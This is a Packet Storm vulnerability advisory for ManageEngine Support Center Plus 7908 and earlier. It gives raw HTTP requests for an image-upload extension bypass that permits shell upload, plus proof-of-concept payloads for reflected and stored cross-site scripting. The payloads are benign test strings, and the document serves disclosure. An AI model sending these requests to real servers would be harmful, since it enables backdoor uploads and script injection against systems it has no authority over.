exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine Support Center Plus 7908 XSS / Shell Upload

ManageEngine Support Center Plus 7908 XSS / Shell Upload
Posted Oct 16, 2012
Authored by xistence

ManageEngine Support Center Plus versions 7908 and below suffer from multiple cross site scripting and shell upload vulnerabilities.

tags | exploit, shell, vulnerability, xss
SHA-256 | ce1d93bee37427da393ef8b2a378940e15f95dfe2266842aa8f8b6171109489a

ManageEngine Support Center Plus 7908 XSS / Shell Upload

Change Mirror Download
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ManageEngine Support Center Plus <=7908 Multiple Vulnerabilities
# Date : 06-03-2012
# Author : xistence (xistence<[AT]>0x90.nl)
# Software link : http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_8_0.ppm
# Vendor site : http://www.manageengine.com/
# Version : 7908 and lower
# Tested on : CentOS 5.x
+--------------------------------------------------------------------------------------------------------------------------------+


1) Arbitrary File Upload (File Extension Verification Bypass)

It's possible to bypass the image extension check in the ticket creation editor. Normally you would go to Requests -> New Request -> select the "Insert Image" to upload a picture to be included in the ticket and is restricted to jpg/gif/png files. If you send a POST request directly to the /jsp/UploadImage.jsp?Module=Workorder url you'll be able to upload any file. This might lead to uploading web site files which could be used for malicious actions (backdoors/shells).

Below a sample POST request, note that a valid cookie is needed (and be authenticated) to perform these actions. The POST request uploads a file test.txt with the contents "TEST!"

POST /jsp/UploadImage.jsp?Module=WorkOrder HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 231
Content-Type: multipart/form-data; boundary=---------------------------135769595918512168611930018855
Content-Length: 231

-----------------------------135769595918512168611930018855
Content-Disposition: form-data; name="img_file"; filename="test.txt"
Content-Type: image/gif

TEST!

-----------------------------135769595918512168611930018855--



In the HTTP response you'll see this:

<script>var formName = parent.document.getElementById("FORMNAME").value;
var opts = parent.document.forms[formName].INLINEIMAGES.options;
var imgName = "1340090056957.txt";
var option = new Option(imgName, imgName);
option.selected = true;
opts[opts.length] = option;
// parent.showImage("WorkOrder","2","1340090056957.txt");
parent.ZE.activeEditor.previewImage("/inline/"+"WorkOrder"+"/"+"2"+"/"+"1340090056957.txt");//No i18n</script>

Which makes the following url accessable and will show the "TEST!" in clear text:
http://<IP ADDRESS>:8080/inline/WorkOrder/2/1340090056957.txt


2) Reflected XSS

Proof of Concept:
http://<IP ADDRESS>:8080/HomePage.do?fromCustomer=%27;alert%28%22Hello%20World%22%29;%20var%20frompor=%27null


3) Stored XSS vulnerability

How to replicate:

Requests -> New Request
Subject: anything
Description window -> select Edit HTML button -> Insert script code i.e.: <script>alert("Hello World")</script>

POST request headers:

POST /WorkOrder.do HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 312

reqTemplate=&prodId=0&priority=2&reqID=2&usertypename=Requester&reqName=Guest&category=0&item=0&subCategory=0&title=bla&description=bla%3Cscript%3Ealert%28%22Hello+World%22%29%3C%2Fscript%3E&MOD_IND=WorkOrder&FORMNAME=WorkOrderForm&attach=&attPath=&component=Request&attSize=&attachments=&autoCCList=&addWO=addWO


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close